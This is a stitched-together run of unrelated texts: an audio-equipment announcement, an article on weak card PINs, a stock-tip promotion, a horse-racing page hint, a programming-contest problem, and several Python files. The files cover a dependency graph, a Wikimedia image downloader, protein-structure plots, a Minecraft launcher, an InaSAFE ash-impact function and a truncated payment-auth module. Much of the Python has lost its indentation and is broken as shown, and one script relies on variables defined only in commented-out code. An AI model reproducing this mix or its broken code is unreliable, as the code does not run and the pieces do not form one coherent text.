Theta's first Class D amplifiers – the Prometheus Monoblock Amplifiers – are the result of a collaboration between the company's chief engineer Dave Reich and Bruno Putzeys of Hypex.
The Compli Blu 3D Digital Transport (above) – optimised for digital playback and with no analogue outputs – and California Audio Technologies Custom Speaker system complete the line-up of new components.
Theta's new range of high-performance AV components will be distributed in the UK by Absolute Sounds. |
#!/usr/bin/env python3.9
import utils
from configVar import config_vars
try:
import networkx as nx
except ImportError as IE:
raise IE
def create_dependencies_graph(items_table):
retVal = nx.DiGraph()
for iid in items_table.get_all_iids():
for dependant in items_table.get_resolved_details_for_iid(iid, "depends"):
retVal.add_edge(iid, dependant)
return retVal
def create_inheritItem_graph(items_table):
retVal = nx.DiGraph()
for iid in items_table.get_all_iids():
for dependant in items_table.get_resolved_details_for_iid(iid, "inherit"):
retVal.add_edge(iid, dependant)
return retVal
def find_cycles(item_graph):
retVal = nx.simple_cycles(item_graph)
return retVal
def find_leaves(item_graph):
retVal = list()
for node in sorted(item_graph):
        # nx.DiGraph.neighbors returns an iterator, which is always truthy;
        # materialize it so an empty adjacency is detected correctly
        the_neighbors = list(item_graph.neighbors(node))
        if not the_neighbors:
retVal.append(node)
return retVal
def find_needed_by(item_graph, node):
retVal = utils.set_with_order()
if node in item_graph:
predecessors = item_graph.predecessors(node)
for predecessor in predecessors:
if predecessor not in retVal:
retVal.append(predecessor)
retVal.extend(find_needed_by(item_graph, predecessor))
return retVal
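# Minimal usage sketch (items_table is whatever object provides the two
# accessors used above; the IID below is hypothetical):
#     graph = create_dependencies_graph(items_table)
#     list(find_cycles(graph))           # e.g. [['A', 'B']] if A <-> B depend
#     find_needed_by(graph, 'SOME_IID')  # every item that pulls SOME_IID in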
|
If you lose your credit, debit or ATM card, how difficult would it be for someone to clean out your account? If you use any of the passwords pictured to the left, you can pretty much count on it.
More than one-quarter of all credit and debit card passwords could be guessed by attempting just 20 combinations of four-digit numbers, security experts say.
Your birthdate. If you lose your wallet, a thief has access to your birthdate from your driver’s license.
The ever-popular 1234. That’s one of the most popular PIN numbers – and one of the first thieves try.
The seven-digit 8675309. Remember that Tommy Tutone song?
Two-number combinations. Don’t use combinations such as 4545, 1313, and so on.
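To see how little guessing those habits leave an attacker, here is a rough Python sketch that screens a PIN against the patterns above. The short list of common PINs is an illustrative assumption, not survey data:

# Screen a PIN against the weak patterns described in this article.
WEAK_COMMON = {"1234", "1111", "0000", "1212"}  # assumed examples

def looks_weak(pin, birth_year=None):
    if pin in WEAK_COMMON:                      # most-guessed PINs
        return True
    if len(set(pin)) == 1:                      # 7777-style repeats
        return True
    if len(pin) == 4 and pin[:2] == pin[2:]:    # 4545, 1313, ...
        return True
    if birth_year is not None and pin == str(birth_year):  # from a licence
        return True
    return False

print(looks_weak("4545"))        # True
print(looks_weak("1986", 1986))  # True
print(looks_weak("8302"))        # False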
By the way, you also may want to pass on 3141592654. Those are the first digits of Pi. Want to know more about coming up with a password that thieves can’t crack? Check out this article. |
#!/usr/bin/env python
"""Get all images of a wikipedia commons category."""
import json
import logging
import os
import sys
import urllib # images
import urllib2 # text
import xmltodict
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.DEBUG,
stream=sys.stdout)
def create_filelist(category):
"""
Create a list of files in a category.
Parameters
----------
category : string
Returns
-------
list
Examples
--------
>> wikicommons.create_filelist('Category:Unidentified Convolvulaceae')
"""
filelist = []
cats_to_explore = [category]
catsub = len("Category:")
visited_categories = []
while len(cats_to_explore) > 0:
sub_cat = cats_to_explore.pop() # Get next category
sub_filelist = get_direct_files(sub_cat) # Get direct members
for el in sub_filelist:
entry = {'filename': el['filename'],
'status': 'registered',
'category': os.path.join(category[catsub:],
el['category'][catsub:])}
filelist.append(entry)
# get subcategories
sub_categories = get_subcategories(sub_cat)
for el in sub_categories:
if el not in visited_categories:
cats_to_explore.append(el)
else:
logging.warning("Double category (%s)", sub_cat)
visited_categories.append(sub_cat)
logging.info("Done with sub_category '%s' (%i files), %i remaining",
sub_cat,
len(sub_filelist),
len(cats_to_explore))
return filelist
def download_filelist(category, file_path, pixels):
"""Download all files in filelist."""
if os.path.isfile(file_path):
with open(file_path) as data_file:
filelist = json.load(data_file)
else:
# File does not exist right now. Get data and create it.
logging.info("No file '%s' found. Get data.", file_path)
filelist = create_filelist(category)
logging.info("Got data for category '%s'. Write it to '%s'",
category,
file_path)
with open(file_path, 'w') as fp:
json.dump(filelist, fp, indent=2)
logging.info("The category '%s' has %i images.",
category,
len(filelist))
# Now load the images
logging.info("Start loading images for category '%s'", category)
for el in filelist:
if el['status'] != 'downloaded':
el['status'] = 'downloaded'
if not os.path.exists(el['category']):
os.makedirs(el['category'])
get_image(el['filename'],
pixels,
os.path.join(el['category'], el['filename']))
with open(file_path, 'w') as fp:
json.dump(filelist, fp, indent=2)
logging.info('Done loading files.')
def get_direct_files(category):
"""Get a list of all files in category."""
filelist = []
has_continue = True
data = {}
while has_continue:
base_url = "https://commons.wikimedia.org/w/api.php"
url = ("{base_url}?action=query&list=categorymembers&cmtype=file"
"&format=json"
"&cmtitle={category}"
.format(base_url=base_url,
category=urllib.quote_plus(category.encode('utf-8'))))
if 'continue' in data:
url += "&cmcontinue=%s" % data['continue']['cmcontinue']
response = urllib2.urlopen(url)
jsondata = response.read()
data = json.loads(jsondata)
for el in data['query']['categorymembers']:
filename = el['title'][len("File:"):]
filelist.append({'filename': filename,
'category': category})
has_continue = 'continue' in data
return filelist
def get_file_details(commons_name):
"""
Get categories and similar stuff from a single file.
Parameters
----------
commons_name : str
Returns
-------
dict
Examples
--------
>>> get_file_details('Aurelia-aurita-3.jpg')
"""
base_url = "https://tools.wmflabs.org/magnus-toolserver/commonsapi.php"
url = ("{base_url}?image={image}&thumbwidth={pixels}&thumbheight={pixels}"
.format(base_url=base_url,
image=urllib.quote_plus(commons_name.encode('utf-8')),
pixels=128))
    while True:
        try:
            response = urllib2.urlopen(url)
        except urllib2.URLError:
            # transient network failure: retry until the API answers
            continue
        break
xmldata = response.read()
xmldict = xmltodict.parse(xmldata)
return {'categories': xmldict['response']['categories']['category'],
'img_url': xmldict['response']['file']['urls']['thumbnail']}
def get_image(commons_name, pixels, local_filename):
"""
Get a single image from Wikipedia Commons.
Parameters
----------
commons_name : str
pixels : int
Maximum dimension for both width and height
local_filename : str
Path where the image gets saved.
Returns
-------
None
Examples
--------
>>> get_image('Aurelia-aurita-3.jpg', 250, 'local_name.jpg')
>>> get_image('Aurelia-aurita-3.jpg', 500, 'local_name_500.jpg')
"""
base_url = "https://tools.wmflabs.org/magnus-toolserver/commonsapi.php"
url = ("{base_url}?image={image}&thumbwidth={pixels}&thumbheight={pixels}"
.format(base_url=base_url,
image=urllib.quote_plus(commons_name.encode('utf-8')),
pixels=pixels))
response = urllib2.urlopen(url)
xmldata = response.read()
xmldict = xmltodict.parse(xmldata)
img_url = xmldict['response']['file']['urls']['thumbnail']
urllib.urlretrieve(img_url, local_filename)
def download_complete_category(category, pixels, local_folder='.'):
"""
Download all files of a category (recursive).
Parameters
----------
category : string
pixels : int
Maximum size of dimensions of image
Examples
--------
>>> download_complete_category("Category:Ipomoea", 128)
"""
directory = category[len("Category:"):]
store_here = os.path.join(local_folder, directory)
if not os.path.exists(store_here):
os.makedirs(store_here)
download_category_files(category, pixels, store_here)
sub_categories = get_subcategories(category)
for sub_cat in sub_categories:
download_complete_category(sub_cat, pixels, store_here)
def download_category_files(category, pixels, local_folder='.'):
"""
Download all files of a category (non-recursive).
Parameters
----------
category : string
pixels : int
Maximum size of dimensions of image
local_folder : string
Put files here.
Examples
--------
>> download_category_files("Category:Close-ups of Ipomoea flowers", 128)
"""
base_url = "https://commons.wikimedia.org/w/api.php"
url = ("{base_url}?action=query&list=categorymembers&cmtype=file"
"&format=json"
"&cmtitle={category}"
.format(base_url=base_url,
category=urllib.quote_plus(category.encode('utf-8'))))
response = urllib2.urlopen(url)
jsondata = response.read()
data = json.loads(jsondata)
for el in data['query']['categorymembers']:
filename = el['title'][len("File:"):]
logging.info(filename)
get_image(filename, pixels, os.path.join(local_folder, filename))
def get_subcategories(category):
"""
Get names of subcategories.
Parameters
----------
category : string
Returns
-------
list
Titles of all subcategories.
Examples
--------
>>> get_subcategories("Category:Ipomoea")[0]
u'Category:Close-ups of Ipomoea flowers'
"""
base_url = "https://commons.wikimedia.org/w/api.php"
url = ("{base_url}?action=query&list=categorymembers&cmtype=subcat"
"&format=json"
"&cmtitle={category}"
.format(base_url=base_url,
category=urllib.quote_plus(category.encode('utf-8'))))
response = urllib2.urlopen(url)
jsondata = response.read()
data = json.loads(jsondata)
cats = [el['title'] for el in data['query']['categorymembers']]
return cats
if __name__ == '__main__':
import doctest
doctest.testmod()
|
DVCR Buy or Sell? If you are planning to trade DVCR stock, then get a free DVCR technical analysis report. You will get a detailed stock analysis report to help you make better DVCR stock predictions. The stock analysis service is provided by MarketClub, using their Smart Scan and Trade Triangle technology. It uses a combination of technical analysis, fundamental analysis and the current market condition to give you the best DVCR stock forecast.
The DVCR Stock Prediction is based on short term trend analysis and is best used for short term swing traders or day traders rather than long term investors.
Get a FREE analysis on DVCR now.
DVCR is down 6.74% on 04/17/19.
Short term rating on the DVCR stock: NEUTRAL with a score of 3/5.
Get a detailed DVCR stock analysis.
Compare DVCR with any other stocks with the compare two stocks feature. |
# -*- coding: utf-8 -*-
"""
Author: Rachael Kretsch
Big Data Final Project
Secondary Protein Structure
analyse the literature data!!
"""
import pickle
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model
#==============================================================================
#
# struct_file = '../Data/color_fasta.txt' + "_struct_data.pik"
# with open(struct_file, 'rb') as f:
# structures, sequences = pickle.load(f)
#
# new_file = '../Data/color_fasta.txt' + "_seqs_data.pik"
# with open(new_file, 'rb') as f:
# sequences_2,seqids,names,descriptions = pickle.load(f)
#
# good_seqids=['1bfp','3ekh','3ned','4k3g','3cfc',
# '1xkh','2wht','4w6b','4xvp','3dqh',
# '1bgp','4q7t','4qgw','5h88','4l1s',
# '5h89','3s0f','4q9w','3rwt','5hzo']
#
# s2D_accuracies = {}
# s2D_accuracy = 0
#
# j=-1
#
# s2D_predictions = []
# for seqid in seqids:
# j+=1
# if seqid in good_seqids:
# struct = structures[j]
# i=0
# prediction = []
# for line in open('../Data/S2D/'+seqid + '_s2d_out.txt'):
# if line[0]!='>' and line[0]!='#':
# if i<11:
# pred = line[40]
# elif i<101:
# pred= line[41]
# else:
# pred = line[42]
# if pred=='H':
# prediction+=[1]
# elif pred=='E':
# prediction+=[-1]
# else:
# prediction+=[0]
# i+=1
# print(seqid)
# x = range(len(prediction))
# beta = []
# alpha = []
# coil = []
# for amino in prediction:
# if amino == -1:
# beta += [1]
# alpha += [0]
# coil += [0]
# elif amino == 1:
# beta += [0]
# alpha += [1]
# coil += [0]
# else:
# beta += [0]
# alpha += [0]
# coil += [1]
# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')
# plt.scatter(x,coil,label='coil',marker='x', color='green')
# plt.scatter(x,alpha,label='alpha',color='red')
# plt.title('Secondary structure prediction s2D '+seqid)
# plt.xlabel('Amino acid position')
# plt.ylabel('Probability')
# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
# ax=plt.gca()
# fig = plt.gcf()
# fig.set_size_inches
# ax.set_xlim([0,len(prediction)])
# ax.set_ylim([0.9,1.1])
# plt.savefig('../Data/S2D/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
# plt.close()
# s2D_predictions+=[[beta,coil,alpha]]
# struct=struct[:len(prediction)]
# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)
# s2D_accuracy+=acc
# s2D_accuracies[seqid]=acc
#
# s2D_accuracy=s2D_accuracy/len(good_seqids)
# print("accuracy s2D: "+str(s2D_accuracy))
#
#
# SOPM_accuracies = {}
# SOPM_accuracy = 0
#
# j=-1
#
# SOPM_predictions=[]
# for seqid in seqids:
# j+=1
# if seqid in good_seqids:
# struct = structures[j]
# prediction = []
# for line in open('../Data/SOPM/'+seqid + '.sopm.txt'):
# if line[0]in ['H','C','E'] and len(prediction)<len(struct):
# pred = line[0]
# if pred=='H':
# prediction+=[1]
# elif pred=='E':
# prediction+=[-1]
# else:
# prediction+=[0]
# print(seqid)
#
# x = range(len(prediction))
# beta = []
# alpha = []
# coil = []
# for amino in prediction:
# if amino == -1:
# beta += [1]
# alpha += [0]
# coil += [0]
# elif amino == 1:
# beta += [0]
# alpha += [1]
# coil += [0]
# else:
# beta += [0]
# alpha += [0]
# coil += [1]
# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')
# plt.scatter(x,coil,label='coil',marker='x', color='green')
# plt.scatter(x,alpha,label='alpha',color='red')
# plt.title('Secondary structure prediction SOPM '+seqid)
# plt.xlabel('Amino acid position')
# plt.ylabel('Probability')
# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
# ax=plt.gca()
# fig = plt.gcf()
# fig.set_size_inches
# ax.set_xlim([0,len(prediction)])
# ax.set_ylim([0.9,1.1])
# plt.savefig('../Data/SOPM/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
# plt.close()
#
# SOPM_predictions+=[[beta,coil,alpha]]
# struct=struct[:len(prediction)]
# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)
# SOPM_accuracy+=acc
# SOPM_accuracies[seqid]=acc
#
# SOPM_accuracy=SOPM_accuracy/len(good_seqids)
# print("accuracy SOPM: "+str(SOPM_accuracy))
# GOR4_accuracies = {}
# GOR4_accuracy = 0
#
# j=-1
#
# GOR4_predictions = []
# for seqid in seqids:
# j+=1
# if seqid in good_seqids:
# struct = structures[j]
# prediction = []
# for line in open('../Data/GORIV/'+seqid + '.gor4.mpsa.txt'):
# if line[0]in ['H','C','E'] and len(prediction)<len(struct):
# pred = line[0]
# if pred=='H':
# prediction+=[1]
# elif pred=='E':
# prediction+=[-1]
# else:
# prediction+=[0]
# print(seqid)
#
# x = range(len(prediction))
# beta = []
# alpha = []
# coil = []
# for amino in prediction:
# if amino == -1:
# beta += [1]
# alpha += [0]
# coil += [0]
# elif amino == 1:
# beta += [0]
# alpha += [1]
# coil += [0]
# else:
# beta += [0]
# alpha += [0]
# coil += [1]
# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')
# plt.scatter(x,coil,label='coil',marker='x', color='green')
# plt.scatter(x,alpha,label='alpha',color='red')
# plt.title('Secondary structure prediction GOR4 '+seqid)
# plt.xlabel('Amino acid position')
# plt.ylabel('Probability')
# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
# ax=plt.gca()
# fig = plt.gcf()
# fig.set_size_inches
# ax.set_xlim([0,len(prediction)])
# ax.set_ylim([0.9,1.1])
# plt.savefig('../Data/GORIV/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
# plt.close()
#
# GOR4_predictions+=[[beta,coil,alpha]]
# struct=struct[:len(prediction)]
# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)
# GOR4_accuracy+=acc
# GOR4_accuracies[seqid]=acc
#
# GOR4_accuracy=GOR4_accuracy/len(good_seqids)
# print("accuracy GORIV: "+str(GOR4_accuracy))
#
#
# data_file = '../Data/color_fasta.txt' + "_data.pik"
# with open(data_file, 'rb') as f:
# data = pickle.load(f)
#
# np.random.shuffle(data)
#
# data_test, data_train = data[:len(data)//4,:], data[len(data)//4:,:]
#
# x_train = data_train[:,1:]
# y_train = data_train[:,:1]
# x_test = data_test[:,1:]
# y_test = data_test[:,:1]
#
#
# logreg = linear_model.LogisticRegression(C=3.4)
# logreg.fit(x_train,y_train)
# data_file = '../Data/color_fasta.txt' + "_data.pik"
# with open(data_file, 'rb') as f:
# data_full = pickle.load(f)
#
# x_full = data_full[:,1:]
# y_full = data_full[:,:1]
# result_full = logreg.predict(x_full)
#
#
#==============================================================================
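# NOTE: the loop below depends on names built in the commented-out section
# above (seqids, good_seqids, structures, result_full and the *_predictions
# lists) plus a `sequences` list loaded elsewhere; re-enable that section
# before running this block.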
j=-1
i=0
k=-1
for seqid in seqids:
j+=1
if seqid in good_seqids:
k+=1
x = range(len(structures[j]))
beta_real =[]
alpha_real = []
coil_real = []
for amino in structures[j]:
if amino == -1:
beta_real += [1]
alpha_real += [0]
coil_real += [0]
elif amino == 1:
beta_real += [0]
alpha_real += [1]
coil_real += [0]
else:
beta_real += [0]
alpha_real += [0]
coil_real += [1]
plt.scatter(x,beta_real,label='beta_real',marker = 'o',color='blue')
plt.scatter(x,coil_real,label='coil_real',marker='x', color='green')
plt.scatter(x,alpha_real,label='alpha_real',color='red')
log_ = result_full[i:i+len(sequences[j])]
beta_log =[]
alpha_log = []
coil_log = []
for amino in log_:
if amino == -1:
beta_log += [0.9]
alpha_log += [0]
coil_log += [0]
elif amino == 1:
beta_log += [0]
alpha_log += [0.9]
coil_log += [0]
else:
beta_log += [0]
alpha_log += [0]
coil_log += [0.9]
plt.scatter(x,beta_log,label='beta_log',marker = 'o',color='blue')
plt.scatter(x,coil_log,label='coil_log',marker='x', color='green')
plt.scatter(x,alpha_log,label='alpha_log',color='red')
GOR4 = np.array(GOR4_predictions[k])*0.8
x = range(len(GOR4[0]))
plt.scatter(x,GOR4[0],label='beta_GOR4',marker = 'o',color='blue')
plt.scatter(x,GOR4[1],label='coil_GOR4',marker='x', color='green')
plt.scatter(x,GOR4[2],label='alpha_GOR4',color='red')
SOPM = np.array(SOPM_predictions[k])*0.7
x = range(len(SOPM[0]))
plt.scatter(x,SOPM[0],label='beta_SOPM',marker = 'o',color='blue')
plt.scatter(x,SOPM[1],label='coil_SOPM',marker='x', color='green')
plt.scatter(x,SOPM[2],label='alpha_SOPM',color='red')
s2D = np.array(s2D_predictions[k])*0.6
x = range(len(s2D[0]))
plt.scatter(x,s2D[0],label='beta_s2D',marker = 'o',color='blue')
plt.scatter(x,s2D[1],label='coil_s2D',marker='x', color='green')
plt.scatter(x,s2D[2],label='alpha_s2D',color='red')
plt.title('Secondary structure prediction '+seqid)
plt.xlabel('Amino acid position')
plt.ylabel('Probability')
lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
            ax = plt.gca()
            fig = plt.gcf()
            # the bare `fig.set_size_inches` was a no-op; 12x4 inches is an assumed size
            fig.set_size_inches(12, 4)
            ax.set_xlim([0, len(x)])
ax.set_ylim([0.5,1.1])
plt.savefig('../Data/'+seqid+'.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
plt.close()
i+=len(sequences[j])
|
Hint: Below you can find a summary of the last 5 active years of Uto Blotaie in a grid format. Underneath the chart you can also find more details of the races the horse competed in. A link is also provided to the official race result published by the Malta Racing Club.
|
from string import Template
from collections import namedtuple
from ..LibItem import make_comp_items
from ..system import Rule, getStartCodeTemplate, NATIVEKEY
ORDLIBFORM = "{0}/{1}/{2}/{1}-{2}.jar"
NATIVELIBFORM = "{0}/{1}/{2}/{1}-{2}-{3}.jar"
class MCPromotNormal:
'''promotion to minecraft 1.12.2 and earlier.'''
def __init__(self, version):
self.version = version
@property
def version(self):
return self._version
@version.setter
def version(self, version):
self._version = version
def initLibs(self, lib_data, conf, include_native=False):
return make_comp_items(lib_data, conf=conf, include_native=include_native)
def initMcArgs(self, args_data):
return Template(args_data)
def initStartCode(self):
return Template(getStartCodeTemplate())
class MCPromotForge(MCPromotNormal):
def __init__(self, version):
super(MCPromotForge, self).__init__(version)
    # TODO: return these in the same form as initLibs() does
def initForgeLibs(self, forge_lib_data):
forge_list = []
for forge_lib in forge_lib_data:
package, name, version = forge_lib["name"].split(':')
ord_forge_lib = ORDLIBFORM.format(package.replace('.', '/'), name, version)
forge_list.append(ord_forge_lib)
return forge_list
def initMcArgs(self, args_data):
        return Template(args_data)
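# For illustration, a tiny driver showing how initForgeLibs() expands
# Maven-style coordinates into jar paths; the coordinate below is made up.
promot = MCPromotForge('1.12.2')
forge_libs = [{'name': 'net.minecraftforge:forge:1.12.2-14.23.5.2854'}]
print(promot.initForgeLibs(forge_libs))
# -> ['net/minecraftforge/forge/1.12.2-14.23.5.2854/forge-1.12.2-14.23.5.2854.jar']
|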
It’s been a while since I’ve posted, but gee things get busy when steelhead run into town. Here is a great pattern tied by Syd Glasso found on the Rare and Unusual (http://www.rareandunusual.com) pattern listing. It’s definitely a site to bookmark for all of the great patterns and history found inside. It’s been a while since the page was updated, but hopefully it sticks around.
|
# coding=utf-8
"""InaSAFE Disaster risk tool by Australian Aid - Tsunami Raster Impact on
Buildings
Contact : [email protected]
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
import logging
from safe.impact_functions.ash.ash_raster_places.metadata_definitions import \
AshRasterHazardPlacesFunctionMetadata
from safe.impact_functions.bases.continuous_rh_classified_ve import \
ContinuousRHClassifiedVE
from safe.storage.vector import Vector
from safe.common.exceptions import KeywordNotFoundError
from safe.utilities.i18n import tr
from safe.utilities.utilities import main_type
from safe.engine.interpolation import assign_hazard_values_to_exposure_data
from safe.impact_reports.place_exposure_report_mixin import (
PlaceExposureReportMixin)
__author__ = 'etienne'
__project_name__ = 'inasafe-dev'
__filename__ = 'impact_function.py'
__date__ = '7/13/16'
__copyright__ = '[email protected]'
LOGGER = logging.getLogger('InaSAFE')
class AshRasterPlaceFunction(
ContinuousRHClassifiedVE,
PlaceExposureReportMixin):
# noinspection PyUnresolvedReferences
"""Inundation raster impact on building data."""
_metadata = AshRasterHazardPlacesFunctionMetadata()
def __init__(self):
"""Constructor (calls ctor of base class)."""
super(AshRasterPlaceFunction, self).__init__()
PlaceExposureReportMixin.__init__(self)
self.hazard_classes = [
tr('Very Low'),
tr('Low'),
tr('Moderate'),
tr('High'),
tr('Very High'),
]
self.no_data_warning = False
def notes(self):
"""Return the notes section of the report.
:return: The notes that should be attached to this impact report.
:rtype: list
"""
# Range for ash hazard
group_parameters = self.parameters['group_threshold']
unaffected_max = group_parameters.value_map[
'unaffected_threshold']
very_low_max = group_parameters.value_map['very_low_threshold']
low_max = group_parameters.value_map['low_threshold']
medium_max = group_parameters.value_map['moderate_threshold']
high_max = group_parameters.value_map['high_threshold']
fields = [
            tr('Dry zone is defined as an area with no ash, or with an ash '
               'depth of 0 %s') % low_max.unit.abbreviation,
            tr('Very low ash hazard zone is defined as an ash depth of '
               'more than %.1f %s but less than %.1f %s') % (
                unaffected_max.value,
                unaffected_max.unit.abbreviation,
                very_low_max.value,
                very_low_max.unit.abbreviation),
            tr('Low ash hazard zone is defined as an ash depth of '
               'more than %.1f %s but less than %.1f %s') % (
                very_low_max.value,
                very_low_max.unit.abbreviation,
                low_max.value,
                low_max.unit.abbreviation),
            tr('Moderate ash hazard zone is defined as an ash depth of '
               'more than %.1f %s but less than %.1f %s') % (
                low_max.value,
                low_max.unit.abbreviation,
                medium_max.value,
                medium_max.unit.abbreviation),
            tr('High ash hazard zone is defined as an ash depth of '
               'more than %.1f %s but less than %.1f %s') % (
                medium_max.value,
                medium_max.unit.abbreviation,
                high_max.value,
                high_max.unit.abbreviation),
            tr('Very high ash hazard zone is defined as an ash depth of '
               'more than %.1f %s') % (
                high_max.value, high_max.unit.abbreviation)
]
# include any generic exposure specific notes from definitions.py
fields = fields + self.exposure_notes()
# include any generic hazard specific notes from definitions.py
fields = fields + self.hazard_notes()
return fields
def run(self):
"""Tsunami raster impact to buildings (e.g. from Open Street Map)."""
# Range for ash hazard
group_parameters = self.parameters['group_threshold']
unaffected_max = group_parameters.value_map[
'unaffected_threshold'].value
very_low_max = group_parameters.value_map['very_low_threshold'].value
low_max = group_parameters.value_map['low_threshold'].value
medium_max = group_parameters.value_map['moderate_threshold'].value
high_max = group_parameters.value_map['high_threshold'].value
# Interpolate hazard level to building locations
interpolated_layer = assign_hazard_values_to_exposure_data(
self.hazard.layer,
self.exposure.layer,
attribute_name=self.target_field)
# Extract relevant exposure data
features = interpolated_layer.get_data()
total_features = len(interpolated_layer)
try:
population_field = self.exposure.keyword('population_field')
except KeywordNotFoundError:
population_field = None
# required for real time
self.exposure.keyword('name_field')
structure_class_field = self.exposure.keyword('structure_class_field')
exposure_value_mapping = self.exposure.keyword('value_mapping')
self.init_report_var(self.hazard_classes)
for i in range(total_features):
# Get the interpolated depth
ash_hazard_zone = float(features[i][self.target_field])
            # Map ash depth to an index into self.hazard_classes
            # (0=Very Low ... 4=Very High), matching style_classes below.
            if ash_hazard_zone <= unaffected_max:
                current_hash_zone = 0  # not affected; reported with the very low class
            elif unaffected_max < ash_hazard_zone <= very_low_max:
                current_hash_zone = 0  # very low
            elif very_low_max < ash_hazard_zone <= low_max:
                current_hash_zone = 1  # low
            elif low_max < ash_hazard_zone <= medium_max:
                current_hash_zone = 2  # moderate
            elif medium_max < ash_hazard_zone <= high_max:
                current_hash_zone = 3  # high
            elif high_max < ash_hazard_zone:
                current_hash_zone = 4  # very high
            # If not a number or a value outside the real bands.
            else:
                current_hash_zone = 0
usage = features[i].get(structure_class_field, None)
usage = main_type(usage, exposure_value_mapping)
# Add calculated impact to existing attributes
features[i][self.target_field] = current_hash_zone
category = self.hazard_classes[current_hash_zone]
if population_field is not None:
population = float(features[i][population_field])
else:
population = 1
self.classify_feature(category, usage, population, True)
self.reorder_dictionaries()
style_classes = [
dict(
label=self.hazard_classes[0] + ': >%.1f - %.1f cm' % (
unaffected_max, very_low_max),
value=0,
colour='#00FF00',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[1] + ': >%.1f - %.1f cm' % (
very_low_max, low_max),
value=1,
colour='#FFFF00',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[2] + ': >%.1f - %.1f cm' % (
low_max, medium_max),
value=2,
colour='#FFB700',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[3] + ': >%.1f - %.1f cm' % (
medium_max, high_max),
value=3,
colour='#FF6F00',
transparency=0,
size=1
),
dict(
                label=self.hazard_classes[4] + ': >%.1f cm' % high_max,
value=4,
colour='#FF0000',
transparency=0,
size=1
),
]
style_info = dict(
target_field=self.target_field,
style_classes=style_classes,
style_type='categorizedSymbol')
impact_data = self.generate_data()
extra_keywords = {
'target_field': self.target_field,
'map_title': self.metadata().key('map_title'),
'legend_title': self.metadata().key('legend_title'),
'legend_units': self.metadata().key('legend_units'),
}
impact_layer_keywords = self.generate_impact_keywords(extra_keywords)
impact_layer = Vector(
data=features,
projection=interpolated_layer.get_projection(),
geometry=interpolated_layer.get_geometry(),
name=self.metadata().key('layer_name'),
keywords=impact_layer_keywords,
style_info=style_info)
impact_layer.impact_data = impact_data
self._impact = impact_layer
return impact_layer
|
Devu and his friend Amit got selected in a random television reality show. One of the tasks in the show was really interesting. The task was called "the survival" task. In the task, each person has to vote for two persons' names. No one may vote for the same person twice, and no one may vote for himself/herself. After the voting, all the persons whose vote counts equal the highest or the lowest count are kicked out of the show. Naturally the highest voted persons should go out of the show, but to maintain the interestingness of the show, the lowest voted persons are kicked out too.
Devu and Amit naturally don't want to get kicked out of the show. Fortunately, the voting of all persons other than Devu and Amit has already happened, so now Devu and Amit know the vote choices of all other persons. Assume that there are n persons in total. You are guaranteed that n is greater than or equal to 3. Devu has index n - 1 and Amit has index n. The votes of all persons other than Devu and Amit are given to you in two arrays, firstVote and secondVote, each of size n - 2. Now Devu and Amit both want to design a voting strategy after discussing with each other. They want that as few of them as possible (i.e. of Devu and Amit) get kicked out of the show. You have to tell whether, in the best scenario, both, one or none of them will remain in the show. Print a single line containing "both", "one" or "none" according to the situation. You also have to give details of whom Devu and Amit will vote for. If there is more than one possible way they can vote, print any of them.
First line of the test case will contain a single integer n denoting the total number of persons in the show.
Second line contains n - 2 space separated integers denoting the array firstVote, the first votes of all persons other than Devu and Amit.
Third line contains n - 2 space separated integers denoting the array secondVote, the second votes of all persons other than Devu and Amit.
For each test case, print three lines.
First line should contain a single word: "both", "one" or "none".
Second line should contain two space separated integers corresponding to the votes of Devu.
Third line should contain two space separated integers corresponding to the votes of Amit.
Example case 1. There is exactly one way of voting for Devu and Amit. So after the voting, all the persons will have equal votes, and they will all be kicked out of the show. As Devu and Amit are both kicked out, print "none" in the first line. In the second line, print the votes of Devu (index 2), and in the third line print the votes of Amit.
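Since no solution accompanies the statement here, a brute-force sketch may help clarify the task: the other n - 2 ballots are fixed, so Devu and Amit only control four votes, and for small n every legal pair of ballots can simply be tried. The function below is illustrative (Python, 1-based person indices), not an efficient solution for large n.
from itertools import combinations

def best_votes(n, first_vote, second_vote):
    base = [0] * (n + 1)                 # base[i] = votes person i already has
    for v in first_vote + second_vote:
        base[v] += 1
    devu, amit = n - 1, n
    best = (-1, None, None)              # (survivors, devu_votes, amit_votes)
    people = range(1, n + 1)
    for dv in combinations([p for p in people if p != devu], 2):
        for av in combinations([p for p in people if p != amit], 2):
            cnt = list(base)
            for p in dv + av:
                cnt[p] += 1
            hi, lo = max(cnt[1:]), min(cnt[1:])
            # a person survives only with strictly more than the minimum
            # and strictly fewer than the maximum votes
            survivors = sum(1 for p in (devu, amit) if lo < cnt[p] < hi)
            if survivors > best[0]:
                best = (survivors, dv, av)
    word = {0: 'none', 1: 'one', 2: 'both'}[best[0]]
    return word, best[1], best[2]

print(best_votes(3, [2], [3]))           # -> ('none', (1, 3), (1, 2))
|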
import requests
import time
import hashlib
import hmac
import logging
import logging.handlers
import json
from random import randint
from base64 import b64decode
from django.conf import settings
from django.forms import ValidationError
class ChipChapAuthError(Exception):
def __init__(self, message, errors):
super(ChipChapAuthError, self).__init__(message)
self.errors = errors
class ChipChapAuthConnection(object):
def __init__(self):
self.logger = self.init_logger()
if 'client_id' in settings.MULTICURRENCY:
self.able_to_connect = True
cdata = settings.MULTICURRENCY
